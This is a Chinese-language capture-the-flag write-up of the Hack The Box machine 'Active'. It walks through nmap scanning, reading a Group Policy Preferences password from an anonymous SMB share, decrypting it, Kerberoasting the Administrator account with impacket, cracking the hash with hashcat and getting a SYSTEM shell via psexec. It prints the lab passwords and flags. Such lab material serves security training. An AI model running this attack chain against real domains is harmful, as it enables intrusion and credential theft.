Hackthebox - Active
靶场信息
靶场类型
信息收集
Nmap
┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-22 02:56 EDT
Nmap scan report for 10.10.10.100
Host is up (0.32s latency).
Not shown: 65513 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-22 06:57:01Z)
135/tcp open msrpc?
139/tcp open netbios-ssn?
389/tcp open tcpwrapped
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msdfsr?
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open unknown
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open unknown
49155/tcp open tcpwrapped
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open tcpwrapped
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open unknown
49171/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.91%I=7%D=4/22%Time=626251C0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/22%OT=53%CT=1%CU=38032%PV=Y%DS=2%DC=T%G=Y%TM=6262527
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=I%CI=I%TS=7)SEQ(SP=1
OS:05%GCD=1%ISR=10D%TI=I%CI=RD%II=I%SS=O%TS=7)SEQ(SP=105%GCD=1%ISR=10E%TI=R
OS:D%CI=I%II=I%TS=A)OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M5
OS:05NW8ST11%O5=M505NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000
OS:%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF
OS:=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%
OS:Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A
OS:%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y
OS:%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR
OS:%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RU
OS:D=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-22T06:58:32
|_ start_date: 2022-04-22T06:55:19
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 316.49 ms 10.10.14.1
2 316.60 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.91 seconds
Smb
这里看到有 smb,去查看一下
┌──(root💀kali)-[~/Desktop]
└─# smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default shar
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server
Replication READ ONLY
SYSVOL NO ACCESS Logon server
Users NO ACCESS
这里有一个 Replication 目录是可以查看的,去看一下
┌──(root💀kali)-[~/Desktop]
└─# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 249292 blocks available
有个 active.htb 文件夹,给下载下来
recurse ON
prompt OFF
mget *
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
在上面这个文件中找到了一个账号和密码
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
username = active.htb\SVC_TGS
cpassword = edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVm
漏洞利用
使用 kali 自带的 gpp-decrypt 进行解密
┌──(root💀kali)-[~/Desktop]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
username = SVC_TGS
password = GPPstillStandingStrong2k18
现在我们有了账号密码,继续去 smb 里查看文件
smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 279115 blocks available
似乎直接就进系统了,去找找看有没有有价值的文件
cd SVC_TGS\Desktop\
get user.txt
┌──(root💀kali)-[~/Desktop]
└─# cat user.txt
a8644850ef3290ae34457a8ad9982d5e
成功拿到 user 权限的 flag 文件
权限提升
这台机器的 88 端口运行着 k8s(kerberos),咱们可以用 impacket 来进行利用
接着把这台靶机加入到 hosts里
echo 10.10.10.100 active.htb >> /etc/hosts
然后使用这个工具
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-04-22 02:56:29.468554
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$65399e5d81a676e87013d1d2c95a9919$831e286d069ed4766f092217ea7ed3e87d62dd0d864b137ef449c0fe02bd6d418c6ea56c01254956638d0b0e6f9868bab37574dc0bdc29f47106d8d4f96d9f87ceb62920f566339adfc5ec5d2761a97a7843be5b750a38b8f0aa42f67b3c1dd909fa1832796d43b2be9830c78450c46802a3c266a0000d0c898b003edbe894fc11e4746382b5a422e04fa23096c50d3330fa9bcae382771bcc528c090c245327d968f1bb06f345dc2d44cf92624eea731e7467f5a6dfb6c90d016bc716de3ba2128a428e7d0b4529dcad6a4d59b1780f7ef863580a1e56348eb12cb865e21c5ce047d289762b0c2ae694db3ffed75416c9cda974a3e4ca591cf25288a0278d4ff4e971013e74c5dcb2321e6b228de3617ed8f53705443dfa858d732f39df31d153ea5dfed178961933883613c692856a381c68f00a7821f77682b9d303a0c7e9af9f24cb6de1ccb5a1d74b7de0d3952669f4ea1d730a5cfabe52a970a6d38013934bea4cc175c2cdcb0da52087fb5599a769e8f50c90535c46e28a081791eb56377d67eb9b8334e89c15c25268ad9af9cea1b4d44cbd3eb5c5d431bab1aabe922fa75af954ec75b024351dd1d22a2df3d2d9f968d191fd456062f22e11c6af3d64ca9ee0bae77f933e5e1879f9f45b50e88a6de5278fffcdc20a99fde8e6e305b3bb213584d5c047df73f432386500dde52cfc1fc277399979a8b5955008aad50cbcfa359ddd6d634b99064663a49a2f477b4d2d8d21ffd8fdf9ccc43b10db9b58964e198444881f96ce700c9dc6cb6c4192274cd7e52c7340f2c052909a9bc78e6dee1b7758f07ac32154d3f4fd01fa776520c514de5e6c3ba53ea0b2c81d9e8c1d0124b3467610038423bd14dbdbc863ddc9d0dfd8d768a3682ee7da66d38c3e7d31937c1eb5813d4997377649be0b14487de5cf23be190c7f20cec1f47afa101829fbf3e12320481ca79f6254e2462dadae248020ed5b0bfff84367f33f101f734ff5727eaa101a4faaeadf267d20b3211583d7794c0892a62b6dc25caafc96c17f21ef1585aa6b95b89aa831a22959e145b490364aa28c42ea79763a1db3ef5159558e6898faaf40e5757e3d7889308ec79ae1d2d721ea98b2e79914d85380c4385d62ee308caa77982c84eaaccc84b19cc69d16b4ae471b270b66c02b16f450c109e58cd5e524d20b092c62ce573115d204825121da3913418a596157b6274c3ac653d352f10983b08046de6e3ab6715169dbf250bf0212
把这段 hash 保存下来,然后使用 hashcat 进行爆破
hashcat hash /usr/share/wordlists/rockyou.txt -m 13100
Ticketmaster1968
┌──(root💀kali)-[~/Desktop/impacket/examples]
└─# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100 1 ⚙
Impacket v0.9.25.dev1+20220420.234604.17ae0913 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CahMAAGa.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service jzgq on 10.10.10.100.....
[*] Starting service jzgq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
成功拿到 root 权限的 shell
c:\Users\Administrator\Desktop> type root.txt
d7a6880e1ed8648dcb9012f911819322
成功拿到 root 权限的 flag 文件
